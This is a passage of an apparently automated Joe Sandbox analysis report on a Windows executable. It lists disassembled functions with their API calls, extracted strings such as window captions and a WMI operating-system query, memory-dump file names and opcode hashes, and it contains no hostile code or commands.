                                                                                                                    • Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
                                                                                                                    • Instruction Fuzzy Hash: A5815AF13043464BDF28DE68E885BBD37D4EB90308F04193DE9D6AB2C2DA748985C752
                                                                                                                    Function 00E551C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bff0987ef12eff1bc079a97437faaee4eac596345126e006c7c833117cce5410
                                                                                                                    • Instruction ID: 17def758b74add340b86f68acaab65d19ce5c1494b3c50e201279aeeeb9fbc40
                                                                                                                    • Opcode Fuzzy Hash: bff0987ef12eff1bc079a97437faaee4eac596345126e006c7c833117cce5410
                                                                                                                    • Instruction Fuzzy Hash: 5861593B600F0496DA345A68A8B57FE23A4EB0174BF143D1AEC47FF2A1D2919D4E8711
                                                                                                                    Function 00E54F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                    • Instruction ID: 48a928fd8662e41f83331b73e63cc21ed4a8291da0c38e07d0dcf1c9d1d19bec
                                                                                                                    • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                                                                                                    • Instruction Fuzzy Hash: 9E5113A3200F4467DB3456688576BBF67D59B0230FF183C19ED82FB2C2D605AD8D83A1
                                                                                                                    Function 00E3EFE2 Relevance: .2, Instructions: 161COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 64ac1936fa1795837d5d5cf2114cb11b3bb3fe2c735a0a549e2146cbfcd38978
                                                                                                                    • Instruction ID: 264806be2baa27ac23bd2e380c799c668c7c88f6c9667631291bfd1e43044270
                                                                                                                    • Opcode Fuzzy Hash: 64ac1936fa1795837d5d5cf2114cb11b3bb3fe2c735a0a549e2146cbfcd38978
                                                                                                                    • Instruction Fuzzy Hash: 8D51F8359093D58FC711CF38D14446EBFE0AE9A318F4919AEE4D96B243C231DB4ACB62
                                                                                                                    Function 00E400B7 Relevance: .1, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c43dc15d01839d002e3a3c53856eb317291ffd0cad67265b16c9d64aa1edd794
                                                                                                                    • Instruction ID: 594c6360eb75056a4ebec888ed5b0901f0837332486f7ae0d9a4f7f174efc808
                                                                                                                    • Opcode Fuzzy Hash: c43dc15d01839d002e3a3c53856eb317291ffd0cad67265b16c9d64aa1edd794
                                                                                                                    • Instruction Fuzzy Hash: 0D51EFB1A087119FC748CF19D48055AF7E1FF88314F058A2EE899E3340D734EA59CB9A
                                                                                                                    Function 00E43E0B Relevance: .1, Instructions: 112COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                    • Instruction ID: f7110195306e5c0ef2c159395bfa81bf9bcea8474557efcbc3f49a5ccc743c08
                                                                                                                    • Opcode Fuzzy Hash: 39963e26f0f32bb957082511270cc61aa548dbbc85140380b543ac3b2cb39bde
                                                                                                                    • Instruction Fuzzy Hash: DA3102B1B047068FCB18DF28C8552AABBE0FB95304F14592DE4C9E7342C734EA4ACB91
                                                                                                                    Function 00E3E2E8 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 234COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 00E3E30E
                                                                                                                      • Part of subcall function 00E34092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E340A5
                                                                                                                      • Part of subcall function 00E41DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00E71030,00000200,00E3D928,00000000,?,00000050,00E71030), ref: 00E41DC4
                                                                                                                    • _strlen.LIBCMT ref: 00E3E32F
                                                                                                                    • SetDlgItemTextW.USER32(?,00E6E274,?), ref: 00E3E38F
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00E3E3C9
                                                                                                                    • GetClientRect.USER32(?,?), ref: 00E3E3D5
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00E3E475
                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00E3E4A2
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00E3E4DB
                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00E3E4E3
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00E3E4EE
                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00E3E51B
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00E3E58D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                    • String ID: $%s:$CAPTION$d$t
                                                                                                                    • API String ID: 2407758923-369353836
                                                                                                                    • Opcode ID: 0424f4680fbeb75fd9e731aa49c5b86c4746b2e82ce8f1aac4c8fab5cf898100
                                                                                                                    • Instruction ID: e5aab3104fdeb1278f860e03ba6ac3514ae1916cc5b3e4e84b2f63e2a3630fe2
                                                                                                                    • Opcode Fuzzy Hash: 0424f4680fbeb75fd9e731aa49c5b86c4746b2e82ce8f1aac4c8fab5cf898100
                                                                                                                    • Instruction Fuzzy Hash: 62819171208301AFD710DF69CD89A6FBBE9EBC8704F04191EF984B7290D671E909CB52
                                                                                                                    Function 00E5CB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 00E5CB66
                                                                                                                      • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C71E
                                                                                                                      • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C730
                                                                                                                      • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C742
                                                                                                                      • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C754
                                                                                                                      • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C766
                                                                                                                      • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C778
                                                                                                                      • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C78A
                                                                                                                      • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C79C
                                                                                                                      • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C7AE
                                                                                                                      • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C7C0
                                                                                                                      • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C7D2
                                                                                                                      • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C7E4
                                                                                                                      • Part of subcall function 00E5C701: _free.LIBCMT ref: 00E5C7F6
                                                                                                                    • _free.LIBCMT ref: 00E5CB5B
                                                                                                                      • Part of subcall function 00E58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?), ref: 00E58DE2
                                                                                                                      • Part of subcall function 00E58DCC: GetLastError.KERNEL32(?,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?,?), ref: 00E58DF4
                                                                                                                    • _free.LIBCMT ref: 00E5CB7D
                                                                                                                    • _free.LIBCMT ref: 00E5CB92
                                                                                                                    • _free.LIBCMT ref: 00E5CB9D
                                                                                                                    • _free.LIBCMT ref: 00E5CBBF
                                                                                                                    • _free.LIBCMT ref: 00E5CBD2
                                                                                                                    • _free.LIBCMT ref: 00E5CBE0
                                                                                                                    • _free.LIBCMT ref: 00E5CBEB
                                                                                                                    • _free.LIBCMT ref: 00E5CC23
                                                                                                                    • _free.LIBCMT ref: 00E5CC2A
                                                                                                                    • _free.LIBCMT ref: 00E5CC47
                                                                                                                    • _free.LIBCMT ref: 00E5CC5F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                    • String ID: h
                                                                                                                    • API String ID: 161543041-3415971826
                                                                                                                    • Opcode ID: d54240f4791727d7e8a1f6d1aa3cdd86b4dc8213b9e0d3274e1bbca7b8e1ba23
                                                                                                                    • Instruction ID: 43e63a2ff1ec70d7e47a6619e9b26fcb49a378e9c964cd5575b8e73679e2e20c
                                                                                                                    • Opcode Fuzzy Hash: d54240f4791727d7e8a1f6d1aa3cdd86b4dc8213b9e0d3274e1bbca7b8e1ba23
                                                                                                                    • Instruction Fuzzy Hash: 5C314D316003099FEB20AA38D956B5AB7F9EF50316F207C19E958F7192DF35AC88CB10
                                                                                                                    Function 00E596F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _free.LIBCMT ref: 00E59705
                                                                                                                      • Part of subcall function 00E58DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?), ref: 00E58DE2
                                                                                                                      • Part of subcall function 00E58DCC: GetLastError.KERNEL32(?,?,00E5C896,?,00000000,?,00000000,?,00E5C8BD,?,00000007,?,?,00E5CCBA,?,?), ref: 00E58DF4
                                                                                                                    • _free.LIBCMT ref: 00E59711
                                                                                                                    • _free.LIBCMT ref: 00E5971C
                                                                                                                    • _free.LIBCMT ref: 00E59727
                                                                                                                    • _free.LIBCMT ref: 00E59732
                                                                                                                    • _free.LIBCMT ref: 00E5973D
                                                                                                                    • _free.LIBCMT ref: 00E59748
                                                                                                                    • _free.LIBCMT ref: 00E59753
                                                                                                                    • _free.LIBCMT ref: 00E5975E
                                                                                                                    • _free.LIBCMT ref: 00E5976C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID: 0d
                                                                                                                    • API String ID: 776569668-2809447700
                                                                                                                    • Opcode ID: 2ba7dcf9f9ca8bed24f7e2f62b19a2a0681356868fb30957bd9f66fcea69c06b
                                                                                                                    • Instruction ID: 94d581e4242e84146f74f4435e9d2660cd8f655ae551d363858ecd8554ddf2b5
                                                                                                                    • Opcode Fuzzy Hash: 2ba7dcf9f9ca8bed24f7e2f62b19a2a0681356868fb30957bd9f66fcea69c06b
                                                                                                                    • Instruction Fuzzy Hash: 8F11937611010DAFCB01EF54CA42CD93BF9EF14351B5168A1FF08AF262DE32DA589B84
                                                                                                                    Function 00E49711 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 126memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 00E49736
                                                                                                                    • _wcslen.LIBCMT ref: 00E497D6
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00E497E5
                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00E49806
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E4982D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                    • String ID: Fjun$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                    • API String ID: 1777411235-1684715023
                                                                                                                    • Opcode ID: 2d38d9cff2c2e2f56de926031b4eb7adcb9489550850f7bbb3851156d88ecbd4
                                                                                                                    • Instruction ID: 80c3a5b6dbbf0f1dd5bd46d187769ad66a818a1a8d03f481d19922cb0585b1ff
                                                                                                                    • Opcode Fuzzy Hash: 2d38d9cff2c2e2f56de926031b4eb7adcb9489550850f7bbb3851156d88ecbd4
                                                                                                                    • Instruction Fuzzy Hash: B8314A325083017ED725AF34BC06F6F77D89F42361F14251EF901B61D3EB649A0883A6
                                                                                                                    Function 00E4D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00E4D6C1
                                                                                                                    • GetClassNameW.USER32(00000000,?,00000800), ref: 00E4D6ED
                                                                                                                      • Part of subcall function 00E41FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E3C116,00000000,.exe,?,?,00000800,?,?,?,00E48E3C), ref: 00E41FD1
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00E4D709
                                                                                                                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00E4D720
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00E4D734
                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00E4D75D
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E4D764
                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00E4D76D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                    • String ID: STATIC
                                                                                                                    • API String ID: 3820355801-1882779555
                                                                                                                    • Opcode ID: 5ba89eccb80c9e65f3911bd1bb500bf581cee8abdc8900ac3d5d5a4c4532abc8
                                                                                                                    • Instruction ID: 0ea8a1606024acb7944643227ac4eabedc64c12324d2db4f9229d440ecca7b79
                                                                                                                    • Opcode Fuzzy Hash: 5ba89eccb80c9e65f3911bd1bb500bf581cee8abdc8900ac3d5d5a4c4532abc8
                                                                                                                    • Instruction Fuzzy Hash: 3C1133726493107FE6206B71BC4EFAF769CAF44721F006123FA01F20E1DA648F0942A5
                                                                                                                    Function 00E52E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                    • String ID: csm$csm$csm
                                                                                                                    • API String ID: 322700389-393685449
                                                                                                                    • Opcode ID: b2a8fc92034ceeb4c60bb3bfd0bd473aef7efc1cfc3473a4ab4085cc3e6b9450
                                                                                                                    • Instruction ID: d535ed390f2d408fd448081018e097ad03939ec447f273f56a01af55c4377a86
                                                                                                                    • Opcode Fuzzy Hash: b2a8fc92034ceeb4c60bb3bfd0bd473aef7efc1cfc3473a4ab4085cc3e6b9450
                                                                                                                    • Instruction Fuzzy Hash: 07B19731900209EFCF29DFB4D9818AEBBB5BF05356F14695AED017B212C731DA19CBA1
                                                                                                                    Function 00E3AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n
                                                                                                                    • API String ID: 3519838083-140586453
                                                                                                                    • Opcode ID: 97d6fb04e715f408ff846d2cf75135b473ee30062e86c5524238565bfe98e012
                                                                                                                    • Instruction ID: 9c6fcd2e1a7d294e0e1687f2abe25581deee613781471913bc110b21fcaa104f
                                                                                                                    • Opcode Fuzzy Hash: 97d6fb04e715f408ff846d2cf75135b473ee30062e86c5524238565bfe98e012
                                                                                                                    • Instruction Fuzzy Hash: 11716C71A00219EFDB18DFA5D8999AFBBB9FF88354F041169E512B72A0CB30AD45CB50
                                                                                                                    Function 00E36FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00E36FAA
                                                                                                                    • _wcslen.LIBCMT ref: 00E37013
                                                                                                                    • _wcslen.LIBCMT ref: 00E37084
                                                                                                                      • Part of subcall function 00E37A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E37AAB
                                                                                                                      • Part of subcall function 00E37A9C: GetLastError.KERNEL32 ref: 00E37AF1
                                                                                                                      • Part of subcall function 00E37A9C: CloseHandle.KERNEL32(?), ref: 00E37B00
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
